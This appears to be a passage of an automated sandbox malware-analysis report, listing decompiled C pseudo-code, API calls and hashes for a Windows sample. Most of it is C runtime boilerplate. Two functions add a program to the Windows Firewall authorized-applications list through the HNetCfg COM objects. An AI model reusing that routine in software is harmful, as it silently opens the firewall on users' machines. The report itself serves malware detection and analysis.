                                                                                                                                                      				}
                                                                                                                                                      			}















                                                                                                                                                      0x009975a5
                                                                                                                                                      0x009975a5
                                                                                                                                                      0x009975ad
                                                                                                                                                      0x009975b0
                                                                                                                                                      0x009975b2
                                                                                                                                                      0x009975b8
                                                                                                                                                      0x009975b8
                                                                                                                                                      0x00997508
                                                                                                                                                      0x00997508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997508
                                                                                                                                                      0x009974e3
                                                                                                                                                      0x009974e6
                                                                                                                                                      0x009974e6
                                                                                                                                                      0x009974eb
                                                                                                                                                      0x009974ed
                                                                                                                                                      0x009974ee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009974f0
                                                                                                                                                      0x009974f5
                                                                                                                                                      0x009974fb
                                                                                                                                                      0x009974fc
                                                                                                                                                      0x009974fd
                                                                                                                                                      0x009974fe
                                                                                                                                                      0x009974ff
                                                                                                                                                      0x00997500
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997505

                                                                                                                                                      APIs
                                                                                                                                                      • __lock.LIBCMT ref: 00997548
                                                                                                                                                      • ___sbh_alloc_block.LIBCMT ref: 00997554
                                                                                                                                                      • _memset.LIBCMT ref: 00997575
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001,00000214,?,00000000), ref: 0099758A
                                                                                                                                                        • Part of subcall function 009938CA: __getptd_noexit.LIBCMT ref: 009938CA
                                                                                                                                                        • Part of subcall function 00993862: __decode_pointer.LIBCMT ref: 0099386D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3771094184-0
                                                                                                                                                      • Opcode ID: 61d9efc34da512213a597d65959b960b2e073a52dbb31d461c9bfbb1406c3059
                                                                                                                                                      • Instruction ID: ba8ee5bcf2fa72de05a3bfe36690b54f7aff035c8691c1610daf7d13bfb8b9ff
                                                                                                                                                      • Opcode Fuzzy Hash: 61d9efc34da512213a597d65959b960b2e073a52dbb31d461c9bfbb1406c3059
                                                                                                                                                      • Instruction Fuzzy Hash: 38212871A28600ABCF52AFACCC81A5DB765FFD1350F268615F81A9B1D1DB308E40DB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00992087(int _a4) {
                                                                                                                                                      
                                                                                                                                                      				E0099205C(_a4);
                                                                                                                                                      				ExitProcess(_a4);
                                                                                                                                                      			}



                                                                                                                                                      0x0099208f
                                                                                                                                                      0x00992098

                                                                                                                                                      APIs
                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0099208F
                                                                                                                                                        • Part of subcall function 0099205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00992094,00000000,?,0099740E,000000FF,0000001E,?,0099553F,00000000,00000001,00000000,?,00993BC7,00000018), ref: 00992066
                                                                                                                                                        • Part of subcall function 0099205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00992076
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00992098
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                      • Opcode ID: db9ee728ad8f987e5653ecb9b84683d1042bbac122295c6f6e4f6e33e9ab3637
                                                                                                                                                      • Instruction ID: 016f7e5932c56d13fcdd8c17d38f46d783b825bac2f09c5b5031c43a207aea5b
                                                                                                                                                      • Opcode Fuzzy Hash: db9ee728ad8f987e5653ecb9b84683d1042bbac122295c6f6e4f6e33e9ab3637
                                                                                                                                                      • Instruction Fuzzy Hash: B4B09231004108FBCF212F1ADC0AC4A7F2AEB813A0B108021F80809071DF72ED93EA90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00994D4A(intOrPtr _a4) {
                                                                                                                                                      				void* _t6;
                                                                                                                                                      
                                                                                                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                      				 *0x9a093c = _t6;
                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                      					 *0x9a0a98 = 1;
                                                                                                                                                      					return 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t6;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00994D5F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                      • Opcode ID: 2f2f81deb8fb08836b134671d54812ba8ec2c85ad2fc7069c269998446c3aae5
                                                                                                                                                      • Instruction ID: 50ec0a2f43495795cc69c98bae9f570cf1362d44e665dbeff152b41fd4c46fdb
                                                                                                                                                      • Opcode Fuzzy Hash: 2f2f81deb8fb08836b134671d54812ba8ec2c85ad2fc7069c269998446c3aae5
                                                                                                                                                      • Instruction Fuzzy Hash: AFD05EB66687059EEF015F757C09B263BDC9BC4395F108436B80CC6190E670D990EA80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                      			E009922A3(intOrPtr _a4) {
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				void* _t3;
                                                                                                                                                      				void* _t4;
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				_t2 = E00992177(_t3, _t4, _t5, _t6, _t9); // executed
                                                                                                                                                      				return _t2;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _doexit.LIBCMT ref: 009922AF
                                                                                                                                                        • Part of subcall function 00992177: __lock.LIBCMT ref: 00992185
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921BC
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921D1
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921FB
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 00992211
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 0099221E
                                                                                                                                                        • Part of subcall function 00992177: __initterm.LIBCMT ref: 0099224D
                                                                                                                                                        • Part of subcall function 00992177: __initterm.LIBCMT ref: 0099225D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                      • Instruction ID: 0e97d0a0ae380edd6ce84aaf26b12c07a81dcb6f0d28d3976cc2cb8ef860f8b8
                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                      • Instruction Fuzzy Hash: F3B0923268420833DA202646AC03F063A4D8BC1B60E240020BA0C191A1A9A3A9628089
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00993148() {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      
                                                                                                                                                      				_t1 = E009930D6(0); // executed
                                                                                                                                                      				return _t1;
                                                                                                                                                      			}




                                                                                                                                                      0x0099314a
                                                                                                                                                      0x00993150

                                                                                                                                                      APIs
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 0099314A
                                                                                                                                                        • Part of subcall function 009930D6: TlsGetValue.KERNEL32(00000000,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 009930E8
                                                                                                                                                        • Part of subcall function 009930D6: TlsGetValue.KERNEL32(00000004,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 009930FF
                                                                                                                                                        • Part of subcall function 009930D6: RtlEncodePointer.NTDLL(00000000,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 0099313D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2585649348-0
                                                                                                                                                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                      • Instruction ID: a8753fc2bb284a10736cc3b65f9ea20d90b8bc86f900cdd26c20d833fa180f02
                                                                                                                                                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00991C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                      				void* _v804;
                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                      				intOrPtr _v812;
                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				long _t17;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                      				_t6 = __eax;
                                                                                                                                                      				_t34 = _t22 -  *0x99f008; // 0x315d8c09
                                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                                      					asm("repe ret");
                                                                                                                                                      				}
                                                                                                                                                      				 *0x9a0128 = _t6;
                                                                                                                                                      				 *0x9a0124 = _t22;
                                                                                                                                                      				 *0x9a0120 = _t25;
                                                                                                                                                      				 *0x9a011c = _t21;
                                                                                                                                                      				 *0x9a0118 = _t27;
                                                                                                                                                      				 *0x9a0114 = _t26;
                                                                                                                                                      				 *0x9a0140 = ss;
                                                                                                                                                      				 *0x9a0134 = cs;
                                                                                                                                                      				 *0x9a0110 = ds;
                                                                                                                                                      				 *0x9a010c = es;
                                                                                                                                                      				 *0x9a0108 = fs;
                                                                                                                                                      				 *0x9a0104 = gs;
                                                                                                                                                      				asm("pushfd");
                                                                                                                                                      				_pop( *0x9a0138);
                                                                                                                                                      				 *0x9a012c =  *_t31;
                                                                                                                                                      				 *0x9a0130 = _v0;
                                                                                                                                                      				 *0x9a013c =  &_a4;
                                                                                                                                                      				 *0x9a0078 = 0x10001;
                                                                                                                                                      				_t11 =  *0x9a0130; // 0x0
                                                                                                                                                      				 *0x9a002c = _t11;
                                                                                                                                                      				 *0x9a0020 = 0xc0000409;
                                                                                                                                                      				 *0x9a0024 = 1;
                                                                                                                                                      				_t12 =  *0x99f008; // 0x315d8c09
                                                                                                                                                      				_v812 = _t12;
                                                                                                                                                      				_t13 =  *0x99f00c; // 0xcea273f6
                                                                                                                                                      				_v808 = _t13;
                                                                                                                                                      				 *0x9a0070 = IsDebuggerPresent();
                                                                                                                                                      				_push(1);
                                                                                                                                                      				E00994E10(_t14);
                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x99c1b4);
                                                                                                                                                      				if( *0x9a0070 == 0) {
                                                                                                                                                      					_push(1);
                                                                                                                                                      					E00994E10(_t17);
                                                                                                                                                      				}
                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                      			}




















                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 009925A7
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009925BC
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0099C1B4), ref: 009925C7
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 009925E3
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 009925EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: ca57e35424b676f66cb0ce8b7258cca22fae52968fa49e7e018dec481c94f68b
                                                                                                                                                      • Instruction ID: c51ceb55ad0afa16cbc4ec32676d555c86fd9d442fdd27b29d35a438264611d3
                                                                                                                                                      • Opcode Fuzzy Hash: ca57e35424b676f66cb0ce8b7258cca22fae52968fa49e7e018dec481c94f68b
                                                                                                                                                      • Instruction Fuzzy Hash: 4121DDB492D204DFDB81DF68FC866847BA4FF8E314F00412AE54887261E7B05985EF99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 61%
                                                                                                                                                      			E009917BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				void* _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                      				intOrPtr* _t61;
                                                                                                                                                      				intOrPtr* _t62;
                                                                                                                                                      				intOrPtr* _t63;
                                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				intOrPtr* _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t83;
                                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                                      				intOrPtr* _t92;
                                                                                                                                                      				intOrPtr* _t94;
                                                                                                                                                      				intOrPtr* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				intOrPtr* _t98;
                                                                                                                                                      				intOrPtr* _t100;
                                                                                                                                                      				signed int _t120;
                                                                                                                                                      
                                                                                                                                                      				_t115 = __edx;
                                                                                                                                                      				_t54 =  *0x99f008; // 0x315d8c09
                                                                                                                                                      				_v8 = _t54 ^ _t120;
                                                                                                                                                      				_v52 = _a4;
                                                                                                                                                      				_v48 = _a8;
                                                                                                                                                      				__imp__CoInitialize(0);
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_t59 = E009980F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                      				__imp__CLSIDFromProgID(_t59,  &_v24);
                                                                                                                                                      				_t117 = _t59;
                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                      					_t100 = __imp__CoCreateInstance;
                                                                                                                                                      					_t74 =  *_t100( &_v24, 0, 5, 0x99c17c,  &_v36);
                                                                                                                                                      					_t117 = _t74;
                                                                                                                                                      					if(_t74 >= 0) {
                                                                                                                                                      						_t75 = _v36;
                                                                                                                                                      						_t115 =  &_v32;
                                                                                                                                                      						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
                                                                                                                                                      						_t117 = _t76;
                                                                                                                                                      						if(_t76 >= 0) {
                                                                                                                                                      							_t77 = _v32;
                                                                                                                                                      							_t115 =  &_v40;
                                                                                                                                                      							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
                                                                                                                                                      							_t117 = _t78;
                                                                                                                                                      							if(_t78 >= 0) {
                                                                                                                                                      								_t80 = E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication");
                                                                                                                                                      								__imp__CLSIDFromProgID(_t80,  &_v24);
                                                                                                                                                      								_t117 = _t80;
                                                                                                                                                      								if(_t80 >= 0) {
                                                                                                                                                      									_t83 =  *_t100( &_v24, 0, 5, 0x99c17c,  &_v28);
                                                                                                                                                      									_t117 = _t83;
                                                                                                                                                      									if(_t83 >= 0) {
                                                                                                                                                      										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E009980F0( &_v40, _v48));
                                                                                                                                                      										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009980F0(_t115, _v52));
                                                                                                                                                      										_t90 = _v28;
                                                                                                                                                      										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
                                                                                                                                                      										_t92 = _v28;
                                                                                                                                                      										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
                                                                                                                                                      										_t94 = _v28;
                                                                                                                                                      										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
                                                                                                                                                      										_t96 = _v40;
                                                                                                                                                      										_t115 =  &_v44;
                                                                                                                                                      										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
                                                                                                                                                      										_t117 = _t97;
                                                                                                                                                      										if(_t97 >= 0) {
                                                                                                                                                      											_t98 = _v44;
                                                                                                                                                      											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t60 = _v28;
                                                                                                                                                      				if(_t60 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t60 + 8))(_t60);
                                                                                                                                                      				}
                                                                                                                                                      				_t61 = _v44;
                                                                                                                                                      				if(_t61 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                                                                                                      				}
                                                                                                                                                      				_t62 = _v40;
                                                                                                                                                      				if(_t62 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                      				}
                                                                                                                                                      				_t63 = _v32;
                                                                                                                                                      				if(_t63 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t63 + 8))(_t63);
                                                                                                                                                      				}
                                                                                                                                                      				_t64 = _v36;
                                                                                                                                                      				if(_t64 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t64 + 8))(_t64);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__CoUninitialize();
                                                                                                                                                      				return E00991C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
                                                                                                                                                      			}





































                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 009917E0
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009917FE
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00991804
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 0099182A
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099186D
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991873
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 00991893
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009918A3
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009918B7
                                                                                                                                                      • CoUninitialize.OLE32 ref: 00991945
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 4233194485-1951265404
                                                                                                                                                      • Opcode ID: edb4b16765109d45329c400dd9e179451c27bd537e36c28f3c0ddf5ed8d022d3
                                                                                                                                                      • Instruction ID: 41b16cbddfd3066c25a2acc0d6980eeb169a99878ed945eb03352ae7f0c1c90b
                                                                                                                                                      • Opcode Fuzzy Hash: edb4b16765109d45329c400dd9e179451c27bd537e36c28f3c0ddf5ed8d022d3
                                                                                                                                                      • Instruction Fuzzy Hash: 53512AB1A002199FCF10EBA8C889DEEFBB9FF89710B144555F906E7260DB31AC41CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                      			E0099195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				void* _v44;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t61;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                      				intOrPtr* _t68;
                                                                                                                                                      				intOrPtr* _t69;
                                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      				intOrPtr* _t82;
                                                                                                                                                      				void* _t83;
                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				void* _t90;
                                                                                                                                                      				intOrPtr* _t93;
                                                                                                                                                      				intOrPtr* _t95;
                                                                                                                                                      				intOrPtr* _t100;
                                                                                                                                                      				intOrPtr* _t102;
                                                                                                                                                      				intOrPtr* _t104;
                                                                                                                                                      				intOrPtr* _t106;
                                                                                                                                                      				void* _t107;
                                                                                                                                                      				intOrPtr* _t108;
                                                                                                                                                      				char _t130;
                                                                                                                                                      				signed int _t133;
                                                                                                                                                      
                                                                                                                                                      				_t128 = __edx;
                                                                                                                                                      				_t61 =  *0x99f008; // 0x315d8c09
                                                                                                                                                      				_v8 = _t61 ^ _t133;
                                                                                                                                                      				_v56 = _a4;
                                                                                                                                                      				_t130 = 0;
                                                                                                                                                      				_v60 = _a8;
                                                                                                                                                      				__imp__CoInitialize(0);
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_t66 = E009980F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                      				__imp__CLSIDFromProgID(_t66,  &_v24);
                                                                                                                                                      				_t110 = _t66;
                                                                                                                                                      				if(_t66 >= 0) {
                                                                                                                                                      					_t129 = __imp__CoCreateInstance;
                                                                                                                                                      					_t81 =  *_t129( &_v24, 0, 5, 0x99c17c,  &_v32);
                                                                                                                                                      					_t110 = _t81;
                                                                                                                                                      					if(_t81 >= 0) {
                                                                                                                                                      						_t82 = _v32;
                                                                                                                                                      						_t128 =  &_v44;
                                                                                                                                                      						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
                                                                                                                                                      						_t110 = _t83;
                                                                                                                                                      						if(_t83 >= 0) {
                                                                                                                                                      							_t84 = _v44;
                                                                                                                                                      							_t128 =  &_v40;
                                                                                                                                                      							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
